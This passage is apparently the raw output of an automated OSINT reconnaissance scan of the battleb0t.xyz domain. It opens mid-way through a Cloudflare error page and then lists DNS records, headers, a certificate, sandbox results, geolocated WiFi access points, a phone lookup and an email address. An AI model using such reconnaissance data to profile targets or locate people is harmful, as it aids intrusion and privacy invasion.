<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">nuke.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f605eb97732c7</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 120.97.148.34.bc.googleusercontent.com | 34.148.97.120 |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://stackedit.io/style.css | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.72): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:24:22 | HTTP Headers | No | Web Spider | 10 | 0 | 4 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA |
| 2023-05-12 02:45:35 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 2 | 0 | None | pics.battleb0t.xyz. 300 IN CNAME frabjous-lebkuchen-324004.netlify.app. | pics.battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | Netlify | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:53:07 GMT", "x-nf-request-id": "01H06Y2Y8V02FJ2S9V869KY74K", "content-type": "text/html; charset=UTF-8", "age": "73"} |
| 2023-05-12 02:53:56 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: FA9A:7823:2111191:32C49C6:645C9D43
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-kigq8000156-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683791171.466843,VS0,VE24
Vary: Accept-Encoding
X-Fastly-Request-ID: c2c6815651c463b5fe5f6c442c782301daedbf1f
| 2606:50c0:8001::153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Room 204 (Net ID: 00:02:2D:1C:33:A5) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:09:42 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 119.97.148.34.bc.googleusercontent.com | 34.148.97.119 |
| 2023-05-12 02:54:27 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2000::/35 | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:44:12 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 2 | 0 | 2 | 0 | None | cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 02:46:54 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | teamcity.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:36:85:4f:53:33:b4:86:64:2a:83:12:ed:95:43:fe:1e:22
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 18:58:42 2023 GMT
Not After : Apr 2 18:58:41 2023 GMT
Subject: CN=teamcity.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:a9:1b:77:20:87:f6:da:b4:e6:55:f1:15:61:14:
5d:d5:64:2e:1b:95:d0:fa:42:f5:c5:a3:6e:02:4b:
41:fb:df:35:0c:b5:28:23:7f:95:78:79:7a:ae:1b:
33:21:14:1a:cf:54:dc:ad:7c:ad:0e:d0:0d:13:24:
ac:b2:17:d0:67:2e:56:2e:b6:b0:fc:48:83:bd:01:
86:52:7b:96:4e:60:82:98:48:6b:33:90:dc:af:7a:
0e:ed:26:47:56:e9:2a:9b:55:f7:eb:69:7f:53:8a:
65:d2:d9:9f:8e:b4:d7:c2:d1:e2:bc:27:0e:51:4c:
6a:50:43:bf:f3:eb:93:79:c5:c0:01:20:e4:3f:17:
e9:46:96:6a:c9:c7:d3:3a:19:6a:20:08:fd:61:d6:
98:cf:84:d5:28:4b:ee:2d:d4:11:0b:36:29:51:b8:
23:d5:73:76:da:70:98:bf:4f:33:c0:fe:34:a0:ab:
09:05:a6:dc:26:b2:66:b1:51:b6:f2:4f:d9:92:3a:
c0:21:8b:2a:63:52:83:3f:e9:e2:13:c0:c2:c9:2d:
d5:e5:7e:fd:90:7e:37:42:6b:b9:54:b1:2f:9b:98:
24:d8:0b:1b:69:e7:d3:08:0e:71:57:e8:1a:67:a6:
92:84:48:3f:fc:46:40:41:65:20:38:c9:7e:99:04:
34:72:9a:a0:65:84:01:2f:31:b1:86:06:22:39:91:
0a:ee:bd:30:20:85:c5:8d:5b:4e:77:39:ae:9b:09:
06:f6:07:9d:dd:2d:ba:92:b9:4a:fe:af:b4:b2:6a:
1c:46:10:aa:88:c3:34:ab:7b:51:a7:88:62:ff:6f:
89:37:e0:83:c3:40:7b:7e:a8:e9:d2:e9:e0:68:ff:
51:7e:4a:c3:4d:57:60:55:c2:2c:5e:84:55:31:0d:
f9:06:48:b8:fd:a5:13:e0:6d:e6:16:0e:03:58:98:
01:6a:9c:dd:37:75:36:74:a0:0e:9a:ed:4d:d0:b0:
57:3c:8d:0d:2e:93:98:3c:31:25:01:37:1f:57:7e:
ef:84:b5:c0:04:9b:56:77:f4:78:da:7b:d3:51:11:
80:33:d3:18:83:ee:96:99:02:db:e7:fd:22:71:5a:
7f:e7:e3:95:25:33:c7:56:7f:0d:59:30:dc:3e:03:
7d:f0:6b:ae:f9:f9:7c:ad:ec:ad:62:73:0e:7f:47:
4e:2a:02:fd:df:82:83:00:62:ec:61:18:4d:70:9d:
bd:b9:85:be:c1:ed:b1:f9:61:e0:dc:70:d2:b3:0d:
be:23:ab:b6:3a:43:ae:fe:c3:d3:cf:08:6c:c7:33:
70:eb:d2:70:df:6f:ce:26:37:4c:eb:f9:4f:c2:58:
32:f9:79
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
02:C9:94:28:32:1B:B1:2F:E4:C4:4F:88:0E:4C:57:09:73:5A:37:AF
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:teamcity.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
27:d3:d1:3f:37:d1:a6:d4:dd:5d:21:63:b2:ea:b4:66:27:a6:
fc:15:e2:cd:f0:1a:81:1d:a4:76:d3:26:d6:1f:73:ac:91:e9:
1b:30:5e:03:57:a4:78:5c:1c:9b:32:48:a5:13:6e:fe:4d:2c:
ca:7f:a2:ec:c6:08:67:8d:10:3f:b8:48:53:9b:ab:31:8a:39:
5b:be:de:39:48:27:70:4b:53:85:35:c6:dd:69:ba:94:7b:fe:
33:d6:dc:3e:93:fb:07:c5:1d:2d:db:7b:81:84:0d:f1:31:75:
81:6c:52:e8:a4:f2:94:95:1d:51:50:82:97:37:d5:63:3a:17:
d6:47:90:48:19:2f:01:55:5c:4e:50:b0:6b:36:d6:b3:1f:43:
62:1c:b5:b3:7c:5c:47:78:0f:ba:ae:0b:44:f3:88:f9:26:67:
58:1c:81:8c:05:40:88:56:f9:30:44:64:32:06:0f:52:c3:de:
74:23:e1:51:9e:b3:c2:ea:ae:7b:71:42:02:db:c3:89:ea:af:
b4:cd:24:fe:07:e3:e4:d4:76:9d:9d:ea:3f:83:76:ca:50:69:
73:c4:c1:63:b7:2e:f4:26:47:bc:f1:48:fa:81:d9:4e:df:bc:
18:e1:6a:4b:93:17:ed:e0:1a:a0:b0:88:53:7e:d3:8b:c4:7a:
7e:4b:d4:44
|
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | panel.battleb0t.xyz | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:59:8F:D2) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:09:48 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 73.170.74.34.bc.googleusercontent.com | 34.74.170.73 |
| 2023-05-12 03:12:54 | Raw Data from RIRs | No | numverify | 0 | 0 | 3 | 0 | None | {u'international_format': u'+14806242599', u'local_format': u'4806242599', u'number': u'14806242599', u'valid': True, u'line_type': u'landline', u'location': u'Phoenix', u'country_code': u'US', u'carrier': u'', u'country_name': u'United States of America', u'country_prefix': u'+1'} | +14806242599 |
| 2023-05-12 03:10:33 | Malicious IP Address | Yes | Threat Jammer | 0 | 1 | 3 | 0 | None | Threat Jammer - Risk score: 50 (MEDIUM)
https://threatjammer.com/info/46.101.229.70 | 46.101.229.70 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ADVFN (Category: finance)
https://uk.advfn.com/forum/profile/login | login |
| 2023-05-12 02:58:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 20, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://nam10.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.starken.cl%2Fseguimiento%3Fcodigo%3D976955409&data=05%7C01%7CAGUSTIN.CABANAS%40ryq.cl%7Cd5bb06f3f0e24a7e402f08dabd0a09df%7Cd73e0ff8a9b1476daf0d80919bec2d15%7C0%7C0%7C638030148103130329%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&sdata=aS0OhZAdgz7U62lYmGJ67qipFvIBuqjqn4WcYGqbdtE%3D&reserved=0', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7748:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:6612:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:6612:120:WilError_01"\n "Local\\SM0:7748:304:WilStaging_02"\n "Local\\SM0:7748:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7748:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1576:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn-widgets.chattigo.com"\n 
"config-global.chattigo.com"\n "widgets-static.embluemail.com"\n "www.starken.cl"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.47.70.28:443"\n "164.77.137.103:443"\n "13.33.165.98:443"\n "104.17.25.14:443"\n "142.251.33.104:443"\n "99.86.63.17:443"\n "172.67.69.11:443"\n "200.27.212.183:443"\n "200.27.212.168:443"\n "142.251.215.226:443"\n "35.186.248.98:443"\n "142.251.211.238:443"\n "34.74.170.74:443"\n "74.125.195.157:443"\n "34.73.43.54:443"\n "142.250.69.195:443"\n "52.217.75.116:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7748_1643452734\\Part-RU]- [targetUID: 00000000-00007748]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\000003.log]- 
[targetUID: 00000000-00007748]\n "f_00024d" has type "gzip compressed data max compression original size modulo 2^32 52913"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00024d]- [targetUID: 00000000-00002432]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators with escape sequences"- Location: [%TEMP%\\7748_1128813663\\auto_open_controller.js]- [targetUID: 00000000-00007748]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7748_1643452734\\Part-RU]- [targetUID: 00000000-00007748]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007748]\n "f_00023e" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00002432]\n "crl-set" has type "data"- Location: [%TEMP%\\7748_1017108014\\crl-set]- [targetUID: 00000000-00007748]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "f_000243" has type "ASCII text with very long lines"- [targetUID: N/A]\n "3c873542b3913305_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\3c873542b3913305_0]- [targetUID: 00000000-00007748]\n "f_00023d" has type "gzip compressed data from Unix original size modulo 2^32 72632"- [targetUID: N/A]\n "457f0037-2472-46a8-8c84-b39a4b67fad0.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\457f0037-2472-46a8-8c84-b39a4b67fad0.tmp]- [targetUID: 00000000-00007748]\n "f198b674a1db45f1_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\f198b674a1db45f1_0]- [targetUID: 00000000-00007748]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007748]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007748]\n "cb81b4a6f2aa0f50_0" has type "data"- [targetUID: N/A]\n "8c752ed8fcbfc2ab_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\8c752ed8fcbfc2ab_0]- [targetUID: 00000000-00007748]\n "1e9e77c7-d679-4ce9-a725-3894fdca913a.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\1e9e77c7-d679-4ce9-a725-3894fdca913a.tmp]- [targetUID: 00000000-00007748]\n "11482c34e7a8250b_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\11482c34e7a8250b_0]- [targetUID: 00000000-00007748]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007748]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://nam10.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.starken.cl%2Fseguimiento%3Fcodigo%3D976955409&data=05%7C01%7CAGUSTIN.CABANAS%40ryq.cl%7Cd5bb06f3f0e24a7e402f08dabd0a09df%7Cd73e0ff8a9b1476daf0d80919bec2d15%7C0%7C0%7C638030148103130329%7"\n Pattern match: "https://nam10.safelinks.protection.outlook.com"\n Heuristic match: "cdn-widgets.chattigo.com"\n Heuristic match: "config-global.chattigo.com"\n Heuristic match: "widgets-static.embluemail.com"\n Pattern match: "www.starken.cl"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, 
u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\7748_1128813663\\auto_open_controller.js]- [targetUID: 00000000-00007748]\n Dropped file: "shopping.js" - Location: [%TEMP%\\7748_1128813663\\shopping.js]- [targetUID: 00000000-00007748]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\7748_1643452734\\adblock_snippet.js]- [targetUID: 00000000-00007748]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\7748_1128813663\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007748]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\7748_1128813663\\shopping_iframe_driver.js]- [targetUID: 00000000-00007748]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\7748_1128813663\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007748]\n Dropped file: "product_page.js" - Location: [%TEMP%\\7748_1128813663\\product_page.js]- [targetUID: 00000000-00007748]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\7748_1128813663\\edge_driver.js]- [targetUID: 00000000-00007748]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\7748_1128813663\\shoppingfre.js]- [targetUID: 00000000-00007748]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\7748_1128813663\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007748]'}, {u'category': u'Unusual Characteristics', u'origin': u'Network Traffic', u'identifier': u'network-18', u'name': u'Contacts Mail Related Domain Names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'"widgets-static.embluemail.com" is probably a mail server'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', 
u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7748_1643452734\\Part-RU]- [targetUID: 00000000-00007748]'}, {u'category': u'Spy | 34.74.170.74 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | bilikom (Net ID: 00:14:C1:0F:F1:FC) | 40.2024, 29.0398 |
| 2023-05-12 02:54:14 | Web Content | No | Web Spider | 1 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</html> | kekw.battleb0t.xyz |
| 2023-05-12 02:44:16 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | www.github.com | 185.199.111.153 |
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.136): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:13 | BGP AS Membership | No | Censys | 0 | 0 | 4 | 0 | None | 13335 | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f6051f8c478df-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Vienna (Net ID: 00:09:5B:B1:9F:16) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitHub Category | cdn-185-199-111-153.github.com |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55155989E (Net ID: 00:01:E3:55:98:9E) | 52.3759, 4.8975 |
| 2023-05-12 03:32:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.8:8443 | 188.114.97.0/24 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00lt00.github.io]
https://www.openphish.com/feed.txt | 00lt00.github.io |
| 2023-05-12 03:33:39 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | eKE>Q
RQEA<
QEQAE
G$rG$
Z?xV
_2H-
-EEO1AE
e.coC
?wX3
QE_1<
QEhO0QE
QEAAE
rGDpyt
cv>myz
kPIiG
X?wV<
\u2v5
Qc>ft1
TtV@I
iY>eI
OYIXf
